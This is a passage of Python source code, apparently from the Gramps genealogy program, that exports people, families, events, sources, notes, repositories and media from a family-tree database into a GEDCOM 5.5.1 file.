<GEDCOM_CONTENT_DESCRIPTION> {0:M} """ local_time = time.localtime(time.time()) (year, mon, day, hour, minutes, sec) = local_time[0:6] date_str = "%d %s %d" % (day, libgedcom.MONTH[mon], year) time_str = "%02d:%02d:%02d" % (hour, minutes, sec) rname = self.dbase.get_researcher().get_name() self._writeln(0, "HEAD") self._writeln(1, "SOUR", "Gramps") self._writeln(2, "VERS", VERSION) self._writeln(2, "NAME", "Gramps") self._writeln(1, "DATE", date_str) self._writeln(2, "TIME", time_str) self._writeln(1, "SUBM", "@SUBM@") self._writeln(1, "FILE", filename, limit=255) self._writeln(1, "COPR", 'Copyright (c) %d %s.' % (year, rname)) self._writeln(1, "GEDC") self._writeln(2, "VERS", "5.5.1") self._writeln(2, "FORM", 'LINEAGE-LINKED') self._writeln(1, "CHAR", "UTF-8") # write the language string if the current LANG variable # matches something we know about. lang = glocale.language[0] if lang and len(lang) >= 2: lang_code = LANGUAGES.get(lang[0:2]) if lang_code: self._writeln(1, 'LANG', lang_code) def _submitter(self): """ n @<XREF:SUBM>@ SUBM {1:1} +1 NAME <SUBMITTER_NAME> {1:1} +1 <<ADDRESS_STRUCTURE>> {0:1} +1 <<MULTIMEDIA_LINK>> {0:M} # not used +1 LANG <LANGUAGE_PREFERENCE> {0:3} # not used +1 RFN <SUBMITTER_REGISTERED_RFN> {0:1} # not used +1 RIN <AUTOMATED_RECORD_ID> {0:1} # not used +1 <<CHANGE_DATE>> {0:1} # not used """ owner = self.dbase.get_researcher() name = owner.get_name() phon = owner.get_phone() mail = owner.get_email() self._writeln(0, "@SUBM@", "SUBM") self._writeln(1, "NAME", name) # Researcher is a sub-type of LocationBase, so get_city etc. which are # used in __write_addr work fine. However, the database owner street is # stored in address, so we need to temporarily copy it into street so # __write_addr works properly owner.set_street(owner.get_address()) self.__write_addr(1, owner) if phon: self._writeln(1, "PHON", phon) if mail: self._writeln(1, "EMAIL", mail) def _individuals(self): """ Write the individual people to the gedcom file. Since people like to have the list sorted by ID value, we need to go through a sorting step. We need to reset the progress bar, otherwise, people will be confused when the progress bar is idle. """ self.set_text(_("Writing individuals")) phandles = self.dbase.iter_person_handles() sorted_list = [] for handle in phandles: person = self.dbase.get_person_from_handle(handle) if person: data = (person.get_gramps_id(), handle) sorted_list.append(data) sorted_list.sort() for data in sorted_list: self.update() self._person(self.dbase.get_person_from_handle(data[1])) def _person(self, person): """ Write out a single person. n @XREF:INDI@ INDI {1:1} +1 RESN <RESTRICTION_NOTICE> {0:1} # not used +1 <<PERSONAL_NAME_STRUCTURE>> {0:M} +1 SEX <SEX_VALUE> {0:1} +1 <<INDIVIDUAL_EVENT_STRUCTURE>> {0:M} +1 <<INDIVIDUAL_ATTRIBUTE_STRUCTURE>> {0:M} +1 <<LDS_INDIVIDUAL_ORDINANCE>> {0:M} +1 <<CHILD_TO_FAMILY_LINK>> {0:M} +1 <<SPOUSE_TO_FAMILY_LINK>> {0:M} +1 SUBM @<XREF:SUBM>@ {0:M} +1 <<ASSOCIATION_STRUCTURE>> {0:M} +1 ALIA @<XREF:INDI>@ {0:M} +1 ANCI @<XREF:SUBM>@ {0:M} +1 DESI @<XREF:SUBM>@ {0:M} +1 <<SOURCE_CITATION>> {0:M} +1 <<MULTIMEDIA_LINK>> {0:M} ,* +1 <<NOTE_STRUCTURE>> {0:M} +1 RFN <PERMANENT_RECORD_FILE_NUMBER> {0:1} +1 AFN <ANCESTRAL_FILE_NUMBER> {0:1} +1 REFN <USER_REFERENCE_NUMBER> {0:M} +2 TYPE <USER_REFERENCE_TYPE> {0:1} +1 RIN <AUTOMATED_RECORD_ID> {0:1} +1 <<CHANGE_DATE>> {0:1} """ if person is None: return self._writeln(0, "@%s@" % person.get_gramps_id(), "INDI") self._names(person) self._gender(person) self._person_event_ref('BIRT', person.get_birth_ref()) self._person_event_ref('DEAT', person.get_death_ref()) self._remaining_events(person) self._attributes(person) self._lds_ords(person, 1) self._child_families(person) self._parent_families(person) self._assoc(person, 1) self._person_sources(person) self._addresses(person) self._photos(person.get_media_list(), 1) self._url_list(person, 1) self._note_references(person.get_note_list(), 1) self._change(person.get_change_time(), 1) def _assoc(self, person, level): """ n ASSO @<XREF:INDI>@ {0:M} +1 RELA <RELATION_IS_DESCRIPTOR> {1:1} +1 <<NOTE_STRUCTURE>> {0:M} +1 <<SOURCE_CITATION>> {0:M} """ for ref in person.get_person_ref_list(): person = self.dbase.get_person_from_handle(ref.ref) if person: self._writeln(level, "ASSO", "@%s@" % person.get_gramps_id()) self._writeln(level + 1, "RELA", ref.get_relation()) self._note_references(ref.get_note_list(), level + 1) self._source_references(ref.get_citation_list(), level + 1) def _note_references(self, notelist, level): """ Write out the list of note handles to the current level. We use the Gramps ID as the XREF for the GEDCOM file. """ for note_handle in notelist: note = self.dbase.get_note_from_handle(note_handle) if note: self._writeln(level, 'NOTE', '@%s@' % note.get_gramps_id()) def _names(self, person): """ Write the names associated with the person to the current level. Since nicknames in version < 3.3 are separate from the name structure, we search the attribute list to see if we can find a nickname. Because we do not know the mappings, we just take the first nickname we find, and add it to the primary name. If a nickname is present in the name structure, it has precedence """ nicknames = [attr.get_value() for attr in person.get_attribute_list() if int(attr.get_type()) == AttributeType.NICKNAME] if len(nicknames) > 0: nickname = nicknames[0] else: nickname = "" self._person_name(person.get_primary_name(), nickname) for name in person.get_alternate_names(): self._person_name(name, "") def _gender(self, person): """ Write out the gender of the person to the file. If the gender is not male or female, simply do not output anything. The only valid values are M (male) or F (female). So if the geneder is unknown, we output nothing. """ if person.get_gender() == Person.MALE: self._writeln(1, "SEX", "M") elif person.get_gender() == Person.FEMALE: self._writeln(1, "SEX", "F") def _lds_ords(self, obj, level): """ Simply loop through the list of LDS ordinances, and call the function that writes the LDS ordinance structure. """ for lds_ord in obj.get_lds_ord_list(): self.write_ord(lds_ord, level) def _remaining_events(self, person): """ Output all events associated with the person that are not BIRTH or DEATH events. Because all we have are event references, we have to extract the real event to discover the event type. """ global adop_written # adop_written is only shared between this function and # _process_person_event. This is rather ugly code, but it is difficult # to support an Adoption event without an Adopted relationship from the # parent(s), an Adopted relationship from the parent(s) without an # event, and both an event and a relationship. All these need to be # supported without duplicating the output of the ADOP GEDCOM tag. See # bug report 2370. adop_written = False for event_ref in person.get_event_ref_list(): event = self.dbase.get_event_from_handle(event_ref.ref) if not event: continue self._process_person_event(person, event, event_ref) if not adop_written: self._adoption_records(person, adop_written) def _process_person_event(self, person, event, event_ref): """ Process a person event, which is not a BIRTH or DEATH event. """ global adop_written etype = int(event.get_type()) # if the event is a birth or death, skip it. if etype in (EventType.BIRTH, EventType.DEATH): return role = int(event_ref.get_role()) # if the event role is not primary, skip the event. if role != EventRoleType.PRIMARY: return val = libgedcom.PERSONALCONSTANTEVENTS.get(etype, "").strip() if val and val.strip(): if val in NEEDS_PARAMETER: if event.get_description().strip(): self._writeln(1, val, event.get_description()) else: self._writeln(1, val) else: if event_has_subordinate_data(event, event_ref): self._writeln(1, val) else: self._writeln(1, val, 'Y') if event.get_description().strip(): self._writeln(2, 'TYPE', event.get_description()) else: descr = event.get_description() if descr: self._writeln(1, 'EVEN', descr) else: self._writeln(1, 'EVEN') if val.strip(): self._writeln(2, 'TYPE', val) else: self._writeln(2, 'TYPE', str(event.get_type())) self._dump_event_stats(event, event_ref) if etype == EventType.ADOPT and not adop_written: adop_written = True self._adoption_records(person, adop_written) def _adoption_records(self, person, adop_written): """ Write Adoption events for each child that has been adopted. n ADOP +1 <<INDIVIDUAL_EVENT_DETAIL>> +1 FAMC @<XREF:FAM>@ +2 ADOP <ADOPTED_BY_WHICH_PARENT> """ adoptions = [] for family in [self.dbase.get_family_from_handle(fh) for fh in person.get_parent_family_handle_list()]: if family is None: continue for child_ref in [ref for ref in family.get_child_ref_list() if ref.ref == person.handle]: if child_ref.mrel == ChildRefType.ADOPTED \ or child_ref.frel == ChildRefType.ADOPTED: adoptions.append((family, child_ref.frel, child_ref.mrel)) for (fam, frel, mrel) in adoptions: if not adop_written: self._writeln(1, 'ADOP', 'Y') self._writeln(2, 'FAMC', '@%s@' % fam.get_gramps_id()) if mrel == frel: self._writeln(3, 'ADOP', 'BOTH') elif mrel == ChildRefType.ADOPTED: self._writeln(3, 'ADOP', 'WIFE') else: self._writeln(3, 'ADOP', 'HUSB') def _attributes(self, person): """ Write out the attributes to the GEDCOM file. Since we have already looked at nicknames when we generated the names, we filter them out here. We use the GEDCOM 5.5.1 FACT command to write out attributes not built in to GEDCOM. """ # filter out the nicknames attr_list = [attr for attr in person.get_attribute_list() if attr.get_type() != AttributeType.NICKNAME] for attr in attr_list: attr_type = int(attr.get_type()) name = libgedcom.PERSONALCONSTANTATTRIBUTES.get(attr_type) key = str(attr.get_type()) value = attr.get_value().strip().replace('\r', ' ') if key in ("AFN", "RFN", "REFN", "_UID", "_FSFTID"): self._writeln(1, key, value) continue if key == "RESN": self._writeln(1, 'RESN') continue if name and name.strip(): self._writeln(1, name, value) elif value: self._writeln(1, 'FACT', value) self._writeln(2, 'TYPE', key) else: continue self._note_references(attr.get_note_list(), 2) self._source_references(attr.get_citation_list(), 2) def _source_references(self, citation_list, level): """ Loop through the list of citation handles, writing the information to the file. """ for citation_handle in citation_list: self._source_ref_record(level, citation_handle) def _addresses(self, person): """ Write out the addresses associated with the person as RESI events. """ for addr in person.get_address_list(): self._writeln(1, 'RESI') self._date(2, addr.get_date_object()) self.__write_addr(2, addr) if addr.get_phone(): self._writeln(2, 'PHON', addr.get_phone()) self._note_references(addr.get_note_list(), 2) self._source_references(addr.get_citation_list(), 2) def _photos(self, media_list, level): """ Loop through the list of media objects, writing the information to the file. """ for photo in media_list: self._photo(photo, level) def _child_families(self, person): """ Write the Gramps ID as the XREF for each family in which the person is listed as a child. """ # get the list of familes from the handle list family_list = [self.dbase.get_family_from_handle(hndl) for hndl in person.get_parent_family_handle_list()] for family in family_list: if family: self._writeln(1, 'FAMC', '@%s@' % family.get_gramps_id()) for child in family.get_child_ref_list(): if child.get_reference_handle() == person.get_handle(): if child.frel == ChildRefType.ADOPTED and \ child.mrel == ChildRefType.ADOPTED: self._writeln(2, 'PEDI adopted') elif child.frel == ChildRefType.BIRTH and \ child.mrel == ChildRefType.BIRTH: self._writeln(2, 'PEDI birth') elif child.frel == ChildRefType.STEPCHILD and \ child.mrel == ChildRefType.STEPCHILD: self._writeln(2, 'PEDI stepchild') elif child.frel == ChildRefType.FOSTER and \ child.mrel == ChildRefType.FOSTER: self._writeln(2, 'PEDI foster') elif child.frel == child.mrel: self._writeln(2, 'PEDI Unknown') else: self._writeln(2, '_FREL %s' % PEDIGREE_TYPES.get(child.frel.value, "Unknown")) self._writeln(2, '_MREL %s' % PEDIGREE_TYPES.get(child.mrel.value, "Unknown")) def _parent_families(self, person): """ Write the Gramps ID as the XREF for each family in which the person is listed as a parent. """ # get the list of familes from the handle list family_list = [self.dbase.get_family_from_handle(hndl) for hndl in person.get_family_handle_list()] for family in family_list: if family: self._writeln(1, 'FAMS', '@%s@' % family.get_gramps_id()) def _person_sources(self, person): """ Loop through the list of citations, writing the information to the file. """ for citation_handle in person.get_citation_list(): self._source_ref_record(1, citation_handle) def _url_list(self, obj, level): """ For Person's FAX, PHON, EMAIL, WWW lines; n PHON <PHONE_NUMBER> {0:3} n EMAIL <ADDRESS_EMAIL> {0:3} n FAX <ADDRESS_FAX> {0:3} n WWW <ADDRESS_WEB_PAGE> {0:3} n OBJE {1:1} +1 FORM <MULTIMEDIA_FORMAT> {1:1} +1 TITL <DESCRIPTIVE_TITLE> {0:1} +1 FILE <MULTIMEDIA_FILE_REFERENCE> {1:1} +1 <<NOTE_STRUCTURE>> {0:M} """ for url in obj.get_url_list(): if url.get_type() == UrlType.EMAIL: self._writeln(level, 'EMAIL', url.get_path()) elif url.get_type() == UrlType.WEB_HOME: self._writeln(level, 'WWW', url.get_path()) elif url.get_type() == _('Phone'): self._writeln(level, 'PHON', url.get_path()) elif url.get_type() == _('FAX'): self._writeln(level, 'FAX', url.get_path()) else: self._writeln(level, 'OBJE') self._writeln(level + 1, 'FORM', 'URL') if url.get_description(): self._writeln(level + 1, 'TITL', url.get_description()) if url.get_path(): self._writeln(level + 1, 'FILE', url.get_path(), limit=255) def _families(self): """ Write out the list of families, sorting by Gramps ID. """ self.set_text(_("Writing families")) # generate a list of (GRAMPS_ID, HANDLE) pairs. This list # can then be sorted by the sort routine, which will use the # first value of the tuple as the sort key. sorted_list = sort_handles_by_id(self.dbase.get_family_handles(), self.dbase.get_family_from_handle) # loop through the sorted list, pulling of the handle. This list # has already been sorted by GRAMPS_ID for family_handle in [hndl[1] for hndl in sorted_list]: self.update() self._family(self.dbase.get_family_from_handle(family_handle)) def _family(self, family): """ n @<XREF:FAM>@ FAM {1:1} +1 RESN <RESTRICTION_NOTICE> {0:1) +1 <<FAMILY_EVENT_STRUCTURE>> {0:M} +1 HUSB @<XREF:INDI>@ {0:1} +1 WIFE @<XREF:INDI>@ {0:1} +1 CHIL @<XREF:INDI>@ {0:M} +1 NCHI <COUNT_OF_CHILDREN> {0:1} +1 SUBM @<XREF:SUBM>@ {0:M} +1 <<LDS_SPOUSE_SEALING>> {0:M} +1 REFN <USER_REFERENCE_NUMBER> {0:M} """ if family is None: return gramps_id = family.get_gramps_id() self._writeln(0, '@%s@' % gramps_id, 'FAM') self._family_reference('HUSB', family.get_father_handle()) self._family_reference('WIFE', family.get_mother_handle()) self._lds_ords(family, 1) self._family_events(family) self._family_attributes(family.get_attribute_list(), 1) self._family_child_list(family.get_child_ref_list()) self._source_references(family.get_citation_list(), 1) self._photos(family.get_media_list(), 1) self._note_references(family.get_note_list(), 1) self._change(family.get_change_time(), 1) def _family_child_list(self, child_ref_list): """ Write the child XREF values to the GEDCOM file. """ child_list = [ self.dbase.get_person_from_handle(cref.ref).get_gramps_id() for cref in child_ref_list] for gid in child_list: if gid is None: continue self._writeln(1, 'CHIL', '@%s@' % gid) def _family_reference(self, token, person_handle): """ Write the family reference to the file. This is either 'WIFE' or 'HUSB'. As usual, we use the Gramps ID as the XREF value. """ if person_handle: person = self.dbase.get_person_from_handle(person_handle) if person: self._writeln(1, token, '@%s@' % person.get_gramps_id()) def _family_events(self, family): """ Output the events associated with the family. Because all we have are event references, we have to extract the real event to discover the event type. """ for event_ref in family.get_event_ref_list(): event = self.dbase.get_event_from_handle(event_ref.ref) if event is None: continue self._process_family_event(event, event_ref) self._dump_event_stats(event, event_ref) def _process_family_event(self, event, event_ref): """ Process a single family event. """ etype = int(event.get_type()) val = libgedcom.FAMILYCONSTANTEVENTS.get(etype) if val: if event_has_subordinate_data(event, event_ref): self._writeln(1, val) else: self._writeln(1, val, 'Y') if event.get_type() == EventType.MARRIAGE: self._family_event_attrs(event.get_attribute_list(), 2) if event.get_description().strip() != "": self._writeln(2, 'TYPE', event.get_description()) else: descr = event.get_description() if descr: self._writeln(1, 'EVEN', descr) else: self._writeln(1, 'EVEN') the_type = str(event.get_type()) if the_type: self._writeln(2, 'TYPE', the_type) def _family_event_attrs(self, attr_list, level): """ Write the attributes associated with the family event. The only ones we really care about are FATHER_AGE and MOTHER_AGE which we translate to WIFE/HUSB AGE attributes. """ for attr in attr_list: if attr.get_type() == AttributeType.FATHER_AGE: self._writeln(level, 'HUSB') self._writeln(level + 1, 'AGE', attr.get_value()) elif attr.get_type() == AttributeType.MOTHER_AGE: self._writeln(level, 'WIFE') self._writeln(level + 1, 'AGE', attr.get_value()) def _family_attributes(self, attr_list, level): """ Write out the attributes associated with a family to the GEDCOM file. Since we have already looked at nicknames when we generated the names, we filter them out here. We use the GEDCOM 5.5.1 FACT command to write out attributes not built in to GEDCOM. """ for attr in attr_list: attr_type = int(attr.get_type()) name = libgedcom.FAMILYCONSTANTATTRIBUTES.get(attr_type) key = str(attr.get_type()) value = attr.get_value().replace('\r', ' ') if key in ("AFN", "RFN", "REFN", "_UID"): self._writeln(1, key, value) continue if name and name.strip(): self._writeln(1, name, value) continue else: self._writeln(1, 'FACT', value) self._writeln(2, 'TYPE', key) self._note_references(attr.get_note_list(), level + 1) self._source_references(attr.get_citation_list(), level + 1) def _sources(self): """ Write out the list of sources, sorting by Gramps ID. """ self.set_text(_("Writing sources")) sorted_list = sort_handles_by_id(self.dbase.get_source_handles(), self.dbase.get_source_from_handle) for (source_id, handle) in sorted_list: self.update() source = self.dbase.get_source_from_handle(handle) if source is None: continue self._writeln(0, '@%s@' % source_id, 'SOUR') if source.get_title(): self._writeln(1, 'TITL', source.get_title()) if source.get_author(): self._writeln(1, "AUTH", source.get_author()) if source.get_publication_info(): self._writeln(1, "PUBL", source.get_publication_info()) if source.get_abbreviation(): self._writeln(1, 'ABBR', source.get_abbreviation()) self._photos(source.get_media_list(), 1) for reporef in source.get_reporef_list(): self._reporef(reporef, 1) # break self._note_references(source.get_note_list(), 1) self._change(source.get_change_time(), 1) def _notes(self): """ Write out the list of notes, sorting by Gramps ID. """ self.set_text(_("Writing notes")) note_cnt = 0 sorted_list = sort_handles_by_id(self.dbase.get_note_handles(), self.dbase.get_note_from_handle) for note_handle in [hndl[1] for hndl in sorted_list]: # the following makes the progress bar a bit smoother if not note_cnt % NOTES_PER_PERSON: self.update() note_cnt += 1 note = self.dbase.get_note_from_handle(note_handle) if note is None: continue self._note_record(note) def _note_record(self, note): """ n @<XREF:NOTE>@ NOTE <SUBMITTER_TEXT> {1:1} +1 [ CONC | CONT] <SUBMITTER_TEXT> {0:M} +1 <<SOURCE_CITATION>> {0:M} +1 REFN <USER_REFERENCE_NUMBER> {0:M} +2 TYPE <USER_REFERENCE_TYPE> {0:1} +1 RIN <AUTOMATED_RECORD_ID> {0:1} +1 <<CHANGE_DATE>> {0:1} """ if note: self._writeln(0, '@%s@' % note.get_gramps_id(), 'NOTE ' + note.get()) def _repos(self): """ Write out the list of repositories, sorting by Gramps ID. REPOSITORY_RECORD:= n @<XREF:REPO>@ REPO {1:1} +1 NAME <NAME_OF_REPOSITORY> {1:1} +1 <<ADDRESS_STRUCTURE>> {0:1} +1 <<NOTE_STRUCTURE>> {0:M} +1 REFN <USER_REFERENCE_NUMBER> {0:M} +2 TYPE <USER_REFERENCE_TYPE> {0:1} +1 RIN <AUTOMATED_RECORD_ID> {0:1} +1 <<CHANGE_DATE>> {0:1} """ self.set_text(_("Writing repositories")) sorted_list = sort_handles_by_id(self.dbase.get_repository_handles(), self.dbase.get_repository_from_handle) # GEDCOM only allows for a single repository per source for (repo_id, handle) in sorted_list: self.update() repo = self.dbase.get_repository_from_handle(handle) if repo is None: continue self._writeln(0, '@%s@' % repo_id, 'REPO') if repo.get_name(): self._writeln(1, 'NAME', repo.get_name()) for addr in repo.get_address_list(): self.__write_addr(1, addr) if addr.get_phone(): self._writeln(1, 'PHON', addr.get_phone()) for url in repo.get_url_list(): if url.get_type() == UrlType.EMAIL: self._writeln(1, 'EMAIL', url.get_path()) elif url.get_type() == UrlType.WEB_HOME: self._writeln(1, 'WWW', url.get_path()) elif url.get_type() == _('FAX'): self._writeln(1, 'FAX', url.get_path()) self._note_references(repo.get_note_list(), 1) def _reporef(self, reporef, level): """ n REPO [ @XREF:REPO@ | <NULL>] {1:1} +1 <<NOTE_STRUCTURE>> {0:M} +1 CALN <SOURCE_CALL_NUMBER> {0:M} +2 MEDI <SOURCE_MEDIA_TYPE> {0:1} """ if reporef.ref is None: return repo = self.dbase.get_repository_from_handle(reporef.ref) if repo is None: return repo_id = repo.get_gramps_id() self._writeln(level, 'REPO', '@%s@' % repo_id) self._note_references(reporef.get_note_list(), level + 1) if reporef.get_call_number(): self._writeln(level + 1, 'CALN', reporef.get_call_number()) if reporef.get_media_type(): self._writeln(level + 2, 'MEDI', str(reporef.get_media_type())) def _person_event_ref(self, key, event_ref): """ Write out the BIRTH and DEATH events for the person. """ if event_ref: event = self.dbase.get_event_from_handle(event_ref.ref) if event_has_subordinate_data(event, event_ref): self._writeln(1, key) else: self._writeln(1, key, 'Y') if event.get_description().strip() != "": self._writeln(2, 'TYPE', event.get_description()) self._dump_event_stats(event, event_ref) def _change(self, timeval, level): """ CHANGE_DATE:= n CHAN {1:1} +1 DATE <CHANGE_DATE> {1:1} +2 TIME <TIME_VALUE> {0:1} +1 <<NOTE_STRUCTURE>> # not used """ self._writeln(level, 'CHAN') time_val = time.gmtime(timeval) self._writeln(level + 1, 'DATE', '%d %s %d' % ( time_val[2], libgedcom.MONTH[time_val[1]], time_val[0])) self._writeln(level + 2, 'TIME', '%02d:%02d:%02d' % ( time_val[3], time_val[4], time_val[5])) def _dump_event_stats(self, event, event_ref): """ Write the event details for the event, using the event and event reference information. GEDCOM does not make a distinction between the two. """ dateobj = event.get_date_object() self._date(2, dateobj) if self._datewritten: # write out TIME if present times = [attr.get_value() for attr in event.get_attribute_list() if int(attr.get_type()) == AttributeType.TIME] # Not legal, but inserted by PhpGedView if len(times) > 0: self._writeln(3, 'TIME', times[0]) place = None if event.get_place_handle(): place = self.dbase.get_place_from_handle(event.get_place_handle()) self._place(place, dateobj, 2) for attr in event.get_attribute_list(): attr_type = attr.get_type() if attr_type == AttributeType.CAUSE: self._writeln(2, 'CAUS', attr.get_value()) elif attr_type == AttributeType.AGENCY: self._writeln(2, 'AGNC', attr.get_value()) elif attr_type == _("Phone"): self._writeln(2, 'PHON', attr.get_value()) elif attr_type == _("FAX"): self._writeln(2, 'FAX', attr.get_value()) elif attr_type == _("EMAIL"): self._writeln(2, 'EMAIL', attr.get_value()) elif attr_type == _("WWW"): self._writeln(2, 'WWW', attr.get_value()) for attr in event_ref.get_attribute_list(): attr_type = attr.get_type() if attr_type == AttributeType.AGE: self._writeln(2, 'AGE', attr.get_value()) elif attr_type == AttributeType.FATHER_AGE: self._writeln(2, 'HUSB') self._writeln(3, 'AGE', attr.get_value()) elif attr_type == AttributeType.MOTHER_AGE: self._writeln(2, 'WIFE') self._writeln(3, 'AGE', attr.get_value()) self._note_references(event.get_note_list(), 2) self._source_references(event.get_citation_list(), 2) self._photos(event.get_media_list(), 2) if place: self._photos(place.get_media_list(), 2) def write_ord(self, lds_ord, index): """ LDS_INDIVIDUAL_ORDINANCE:= [ n [ BAPL | CONL ] {1:1} +1 DATE <DATE_LDS_ORD> {0:1} +1 TEMP <TEMPLE_CODE> {0:1} +1 PLAC <PLACE_LIVING_ORDINANCE> {0:1} +1 STAT <LDS_BAPTISM_DATE_STATUS> {0:1} +2 DATE <CHANGE_DATE> {1:1} +1 <<NOTE_STRUCTURE>> {0:M} +1 <<SOURCE_CITATION>> {0:M} p.39 | n ENDL {1:1} +1 DATE <DATE_LDS_ORD> {0:1} +1 TEMP <TEMPLE_CODE> {0:1} +1 PLAC <PLACE_LIVING_ORDINANCE> {0:1} +1 STAT <LDS_ENDOWMENT_DATE_STATUS> {0:1} +2 DATE <CHANGE_DATE> {1:1} +1 <<NOTE_STRUCTURE>> {0:M} +1 <<SOURCE_CITATION>> {0:M} | n SLGC {1:1} +1 DATE <DATE_LDS_ORD> {0:1} +1 TEMP <TEMPLE_CODE> {0:1} +1 PLAC <PLACE_LIVING_ORDINANCE> {0:1} +1 FAMC @<XREF:FAM>@ {1:1} +1 STAT <LDS_CHILD_SEALING_DATE_STATUS> {0:1} +2 DATE <CHANGE_DATE> {1:1} +1 <<NOTE_STRUCTURE>> {0:M} +1 <<SOURCE_CITATION>> {0:M} ] """ self._writeln(index, LDS_ORD_NAME[lds_ord.get_type()]) self._date(index + 1, lds_ord.get_date_object()) if lds_ord.get_family_handle(): family_handle = lds_ord.get_family_handle() family = self.dbase.get_family_from_handle(family_handle) if family: self._writeln(index + 1, 'FAMC', '@%s@' % family.get_gramps_id()) if lds_ord.get_temple(): self._writeln(index + 1, 'TEMP', lds_ord.get_temple()) if lds_ord.get_place_handle(): place = self.dbase.get_place_from_handle( lds_ord.get_place_handle()) self._place(place, lds_ord.get_date_object(), 2) if lds_ord.get_status() != LdsOrd.STATUS_NONE: self._writeln(2, 'STAT', LDS_STATUS[lds_ord.get_status()]) self._note_references(lds_ord.get_note_list(), index + 1) self._source_references(lds_ord.get_citation_list(), index + 1) def _date(self, level, date): """ Write the 'DATE' GEDCOM token, along with the date in GEDCOM's expected format. """ self._datewritten = True start = date.get_start_date() if start != Date.EMPTY: cal = date.get_calendar() mod = date.get_modifier() quality = date.get_quality() if quality in libgedcom.DATE_QUALITY: qual_text = libgedcom.DATE_QUALITY[quality] + " " else: qual_text = "" if mod == Date.MOD_SPAN: val = "%sFROM %s TO %s" % ( qual_text, libgedcom.make_gedcom_date(start, cal, mod, None), libgedcom.make_gedcom_date(date.get_stop_date(), cal, mod, None)) elif mod == Date.MOD_RANGE: val = "%sBET %s AND %s" % ( qual_text, libgedcom.make_gedcom_date(start, cal, mod, None), libgedcom.make_gedcom_date(date.get_stop_date(), cal, mod, None)) else: val = libgedcom.make_gedcom_date(start, cal, mod, quality) self._writeln(level, 'DATE', val) elif date.get_text(): self._writeln(level, 'DATE', date.get_text()) else: self._datewritten = False def _person_name(self, name, attr_nick): """ n NAME <NAME_PERSONAL> {1:1} +1 NPFX <NAME_PIECE_PREFIX> {0:1} +1 GIVN <NAME_PIECE_GIVEN> {0:1} +1 NICK <NAME_PIECE_NICKNAME> {0:1} +1 SPFX <NAME_PIECE_SURNAME_PREFIX {0:1} +1 SURN <NAME_PIECE_SURNAME> {0:1} +1 NSFX <NAME_PIECE_SUFFIX> {0:1} +1 <<SOURCE_CITATION>> {0:M} +1 <<NOTE_STRUCTURE>> {0:M} """ gedcom_name = name.get_gedcom_name() firstname = name.get_first_name().strip() surns = [] surprefs = [] for surn in name.get_surname_list(): surns.append(surn.get_surname().replace('/', '?')) if surn.get_connector(): #we store connector with the surname surns[-1] = surns[-1] + ' ' + surn.get_connector() surprefs.append(surn.get_prefix().replace('/', '?')) surname = ', '.join(surns) surprefix = ', '.join(surprefs) suffix = name.get_suffix() title = name.get_title() nick = name.get_nick_name() if nick.strip() == '': nick = attr_nick self._writeln(1, 'NAME', gedcom_name) if int(name.get_type()) == NameType.BIRTH: pass elif int(name.get_type()) == NameType.MARRIED: self._writeln(2, 'TYPE', 'married') elif int(name.get_type()) == NameType.AKA: self._writeln(2, 'TYPE', 'aka') else: self._writeln(2, 'TYPE', name.get_type().xml_str()) if firstname: self._writeln(2, 'GIVN', firstname) if surprefix: self._writeln(2, 'SPFX', surprefix) if surname: self._writeln(2, 'SURN', surname) if name.get_suffix(): self._writeln(2, 'NSFX', suffix) if name.get_title(): self._writeln(2, 'NPFX', title) if nick: self._writeln(2, 'NICK', nick) self._source_references(name.get_citation_list(), 2) self._note_references(name.get_note_list(), 2) def _source_ref_record(self, level, citation_handle): """ n SOUR @<XREF:SOUR>@ /* pointer to source record */ {1:1} +1 PAGE <WHERE_WITHIN_SOURCE> {0:1} +1 EVEN <EVENT_TYPE_CITED_FROM> {0:1} +2 ROLE <ROLE_IN_EVENT> {0:1} +1 DATA {0:1} +2 DATE <ENTRY_RECORDING_DATE> {0:1} +2 TEXT <TEXT_FROM_SOURCE> {0:M} +3 [ CONC | CONT ] <TEXT_FROM_SOURCE> {0:M} +1 QUAY <CERTAINTY_ASSESSMENT> {0:1} +1 <<MULTIMEDIA_LINK>> {0:M} ,* +1 <<NOTE_STRUCTURE>> {0:M} """ citation = self.dbase.get_citation_from_handle(citation_handle) src_handle = citation.get_reference_handle() if src_handle is None: return src = self.dbase.get_source_from_handle(src_handle) if src is None: return # Reference to the source self._writeln(level, "SOUR", "@%s@" % src.get_gramps_id()) if citation.get_page() != "": # PAGE <WHERE_WITHIN_SOURCE> can not have CONC lines. # WHERE_WITHIN_SOURCE:= {Size=1:248} # Maximize line to 248 and set limit to 248, for no line split self._writeln(level + 1, 'PAGE', citation.get_page()[0:248], limit=248) conf = min(citation.get_confidence_level(), Citation.CONF_VERY_HIGH) if conf != Citation.CONF_NORMAL and conf != -1: self._writeln(level + 1, "QUAY", QUALITY_MAP[conf]) if not citation.get_date_object().is_empty(): self._writeln(level + 1, 'DATA') self._date(level + 2, citation.get_date_object()) if len(citation.get_note_list()) > 0: note_list = [self.dbase.get_note_from_handle(h) for h in citation.get_note_list()] note_list = [n for n in note_list if n.get_type() == NoteType.SOURCE_TEXT] if note_list: ref_text = note_list[0].get() else: ref_text = "" if ref_text != "" and citation.get_date_object().is_empty(): self._writeln(level + 1, 'DATA') if ref_text != "": self._writeln(level + 2, "TEXT", ref_text) note_list = [self.dbase.get_note_from_handle(h) for h in citation.get_note_list()] note_list = [n.handle for n in note_list if n and n.get_type() != NoteType.SOURCE_TEXT] self._note_references(note_list, level + 1) self._photos(citation.get_media_list(), level + 1) even = None for srcattr in citation.get_attribute_list(): if str(srcattr.type) == "EVEN": even = srcattr.value self._writeln(level + 1, "EVEN", even) break if even: for srcattr in citation.get_attribute_list(): if str(srcattr.type) == "EVEN:ROLE": self._writeln(level + 2, "ROLE", srcattr.value) break def _photo(self, photo, level): """ n OBJE {1:1} +1 FORM <MULTIMEDIA_FORMAT> {1:1} +1 TITL <DESCRIPTIVE_TITLE> {0:1} +1 FILE <MULTIMEDIA_FILE_REFERENCE> {1:1} +1 <<NOTE_STRUCTURE>> {0:M} """ photo_obj_id = photo.get_reference_handle() photo_obj = self.dbase.get_media_from_handle(photo_obj_id) if photo_obj: mime = photo_obj.get_mime_type() form = MIME2GED.get(mime, mime) path = media_path_full(self.dbase, photo_obj.get_path()) if not os.path.isfile(path): return self._writeln(level, 'OBJE') if form: self._writeln(level + 1, 'FORM', form) self._writeln(level + 1, 'TITL', photo_obj.get_description()) self._writeln(level + 1, 'FILE', path, limit=255) self._note_references(photo_obj.get_note_list(), level + 1) def _place(self, place, dateobj, level): """ PLACE_STRUCTURE:= n PLAC <PLACE_NAME> 